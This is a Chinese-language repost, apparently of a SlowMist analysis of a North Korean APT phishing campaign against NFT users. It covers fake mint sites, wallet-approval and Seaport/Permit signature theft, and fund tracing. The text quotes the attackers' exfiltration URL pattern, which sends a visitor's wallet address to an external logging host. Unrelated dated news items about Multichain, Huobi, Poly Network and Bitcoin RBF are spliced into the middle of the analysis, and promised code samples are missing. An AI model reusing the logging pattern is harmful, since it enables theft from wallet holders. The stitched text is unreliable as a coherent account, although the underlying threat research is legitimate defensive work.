慢霧：朝鮮APT組織對NFT用戶大規模釣魚事件分析_BSP

9 月 4 日，推特用戶 Phantom X 發推稱朝鮮 APT 組織針對數十個 ETH 和 SOL 項目進行大規模的網絡釣魚活動。

（https://twitter.com/PhantomXSec/status/1566219671057371136 ）

該推特用戶給出了 196 個釣魚域名信息，分析后關聯到朝鮮黑客相關信息，具體的域名列表如下：

（https://pastebin.com/UV 9 pJN 2 M）

慢霧安全團隊注意到該事件并第一時間跟進深入分析：

（https://twitter.com/IM_ 23 pds/status/1566258373284093952 ）

由于朝鮮黑客針對加密貨幣行業的攻擊模型多樣化，我們披露的也只是冰山一角，因為一些保密的要求，本篇文章也僅針對其中一部分釣魚素材包括相關釣魚錢包地址進行分析。這里將重點針對 NFT 釣魚進行分析。

慢霧：從Multichain流出的資金總額高達2.65億美元，分布在9條鏈:金色財經報道，自7月7日以來，從 Multichain 流出的資金總額高達 2.65 億美元，分布在 Ethereum、BNB Chain、Polygon、Avalanche、Arbitrum、Optimism、Fantom、Cronos、Moonbeam 鏈。其中 6582 萬美元已經被 Circle 和 Tether 凍結，1,296,990.99 ICE（約 162 萬美元） 被 Token 發行方 Burn。流出的資金中，包括：

1）從 Multichain: Old BSC Bridge 轉出的 USDT；

2）從 Multichain: Fantom Bridge 轉出的 USDC、DAI、LINK、UNIDX、USDT、WOO、ICE、CRV、YFI、TUSD、WETH、WBTC；

3）從 Anyswap: Bridge Fantom 轉出的 BIFI；

4）從 Multichain: Moonriver Bridge 轉出的 USDC、USDT、DAI、WBTC；

5）從 MultiChain: Doge Bridge 轉出的 USDC；

6）從 Multichain: Executor 轉出的 DAI、USDC、BTCB、WBTC、WETH、Dai.e、WBTC.e、Bridged USDC、BTC、fUSDT、ETH 等；

7）從被 Etherscan 標記為 Fake_Phishing183873 的 0xe1910...49c53 轉出的 WBTC、USDT、ETH，同時我們認為該標記（Fake Phishing183873）或許是 Etherscan 上的虛假標記，地址可能以前屬于 Multichain 官方賬戶。[2023/7/11 10:48:30]

經過深入分析，發現此次釣魚的其中一種方式是發布虛假 NFT 相關的、帶有惡意 Mint 的誘餌網站，這些 NFT 在 OpenSea、X2Y2 和 Rarible 等平臺上都有出售。此次 APT 組織針對 Crypto 和 NFT 用戶的釣魚涉及將近 500 多個域名。

慢霧：針對傳言火幣信息泄漏事件不涉及用戶賬戶與資金安全 請保持客觀冷靜對待:據官方消息，慢霧注意到近日有白帽子公開了此前一個火幣已經處理完畢的過往漏洞信息。經慢霧與火幣官方確認，火幣本著負責任披露信息的策略，對本次事件做以下說明：本次事件是小范圍內（4000人）的用戶聯絡信息泄露，信息種類不涉及敏感信息，不涉及用戶賬戶與資金安全。事件發生于2021年6月22日日本站測試環境S3桶相關人員不規范操作導致，相關用戶信息于2022年10月8日已經完全隔離，日本站與火幣全球站無關。本次事件由白帽團隊發現后，火幣安全團隊2023年6月21日（10天前）已第一時間進行處理，立即關閉相關文件訪問權限，當前漏洞已修復，所有相關用戶信息已經刪除。感謝白帽團隊對于火幣安全做出的貢獻。最后提醒請大家冷靜對待，切勿傳謠。[2023/7/1 22:12:01]

查詢這些域名的注冊相關信息，發現注冊日期最早可追溯到 7 個月前：

同時我們也發現朝鮮黑客常使用的一些獨有的釣魚特征：

特征一：釣魚網站都會記錄訪客數據并保存到外部站點。黑客通過 HTTP GET 請求將站點訪問者信息記錄到外部域，發送請求的域名雖不同但是請求的 API  接口都為 “/postAddr.php”。一般格式為 “https://nserva.live/postAddr.php? mmAddr=...[Metamask]...&accessTime=xxx&url=evil.site”，其中參數 mmAddr 記錄訪客的錢包地址，accessTime 記錄訪客的訪問時間，url 記錄訪客當前所訪問的釣魚網站鏈接。

慢霧：跨鏈互操作協議Poly Network遭受攻擊并非由于網傳的keeper私鑰泄漏:對于跨鏈互操作協議Poly Network遭受攻擊事件，慢霧安全團隊分析指出：本次攻擊主要在于EthCrossChainData合約的keeper可由EthCrossChainManager合約進行修改，而EthCrossChainManager合約的verifyHeaderAndExecuteTx函數又可以通過_executeCrossChainTx函數執行用戶傳入的數據。因此攻擊者通過此函數傳入精心構造的數據修改了EthCrossChainData合約的keeper為攻擊者指定的地址，并非網傳的是由于keeper私鑰泄漏導致這一事件的發生。[2021/8/11 1:47:48]

特征二：釣魚網站會請求一個 NFT 項目價目表，通常 HTTP 的請求路徑為 “getPriceData.php”：

特征三：存在一個鏈接圖像到目標項目的文件 “imgSrc.js”，包含目標站點列表和在其相應網絡釣魚站點上使用的圖像文件的托管位置，這個文件可能是釣魚網站模板的一部分。

慢霧: 警惕比特幣RBF風險:據BitMEX消息，比特幣于區塊高度666833出現陳腐區塊，并產生了一筆 0.00062063 BTC 的雙花交易。根據 BitMEX提供的交易內容來看，雙花的兩筆交易的nSequence字段的值都小于0xffffffff -1。慢霧安全團隊初步認為此次雙花交易有可能是比特幣中的RBF交易。[2021/1/20 16:38:01]

進一步分析發現 APT 用于監控用戶請求的主要域名為 “thedoodles.site”，此域名在 APT 活動早期主要用來記錄用戶數據：

查詢該域名的 HTTPS 證書啟用時間是在 7 個月之前，黑客組織已經開始實施對 NFT 用戶對攻擊。

最后來看下黑客到底運行和部署了多少個釣魚站點：

比如最新的站點偽裝成世界杯主題：

繼續根據相關的 HTTPS 證書搜索得到相關的網站主機信息：

聲音 | 慢霧：使用中心化數字貨幣交易所及錢包的用戶注意撞庫攻擊:據慢霧消息，近日，注意到撞庫攻擊導致用戶數字貨幣被盜的情況，具體原因在于用戶重復使用了已泄露的密碼或密碼通過撞庫攻擊的“密碼生成基本算法”可以被輕易猜測，同時用戶在這些中心化服務里并未開啟雙因素認證。分析認為，被盜用戶之所以沒開啟雙因素認證是以為設置了獨立的資金密碼就很安全，但實際上依賴密碼的認證體系本身就不是個足夠靠譜的安全體系，且各大中心化數字貨幣交易所及錢包在用戶賬號風控體系的策略不一定都一致，這種不一致可能導致用戶由于“慣性思維”而出現安全問題。[2019/3/10]

在一些主機地址中發現了黑客使用的各種攻擊腳本和統計受害者信息的 txt 文件。

這些文件記錄了受害者訪問記錄、授權情況、使用插件錢包的情況：

可以發現這些信息跟釣魚站點采集的訪客數據相吻合。

其中還包括受害者 approve 記錄：

以及簽名數據 sigData 等，由于比較敏感此處不進行展示。

另外，統計發現主機相同 IP 下 NFT 釣魚站群，單獨一個 IP 下就有 372 個 NFT 釣魚站點：

另一個 IP 下也有 320 個 NFT 釣魚站群：

甚至包括朝鮮黑客在經營的一個 DeFi 平臺：

由于篇幅有限，此處不再贅述。

結合之前文章，我們對此次釣魚事件的核心代碼進行了分析。我們發現黑客釣魚涉及到 WETH、USDC、DAI、UNI 等多個地址協議。

下面代碼用于誘導受害者進行授權 NFT、ERC 20 等較常見的釣魚 Approve 操作：

除此之外，黑客還會誘導受害者進行 Seaport、Permit 等簽名。

下面是這種簽名的正常樣例，只是在釣魚網站中不是 “opensea.io” 這個域名。

我們在黑客留下的主機也發現了這些留存的簽名數據和 “Seaport” 的簽名數據特征一致。

由于這類型的簽名請求數據可以“離線存儲”，黑客在拿到大量的受害者簽名數據后批量化的上鏈轉移資產。

對釣魚網站及手法分析后，我們選取其中一個釣魚地址（0xC0fd...e0ca）進行分析。

可以看到這個地址已被 MistTrack 標記為高風險釣魚地址，交易數也還挺多。釣魚者共收到 1055 個 NFT，售出后獲利近 300 ETH。

往上溯源，該地址的初始資金來源于地址（0 x 2 e 0 a...DA 82 ）轉入的 4.97 ETH。往下溯源，則發現該地址有與其他被 MistTrack 標記為風險的地址有交互，以及有 5.7 ETH 轉入了 FixedFloat。

再來分析下初始資金來源地址（0 x 2 e 0 a...DA 82 ），目前收到約 6.5 ETH。初始資金來源于 Binance 轉入的 1.433 ETH。

同時，該地址也是與多個風險地址進行交互。

由于保密性和隱私性，本文僅針對其中一部分 NFT 釣魚素材進行分析，并提煉出朝鮮黑客的部分釣魚特征，當然，這只是冰山一角。慢霧在此建議，用戶需加強對安全知識的了解，進一步強化甄別網絡釣魚攻擊的能力等，避免遭遇此類攻擊。

Ps. 感謝 hip、ScamSniffer 提供的支持。

相關鏈接：

https://www.prevailion.com/what-wicked-webs-we-unweave

https://twitter.com/PhantomXSec/status/1566219671057371136 

https://twitter.com/evilcos/status/1603969894965317632 

慢霧科技

個人專欄

閱讀更多

金色財經 子木

金色早8點

去中心化金融社區

虎嗅科技

區塊律動BlockBeats

CertiK中文社區

深潮TechFlow

念青

Odaily星球日報

騰訊研究院

Tags：NBSBSPETHAINnbs幣發行量BSPTHETH幣Health Data Chain

FIL幣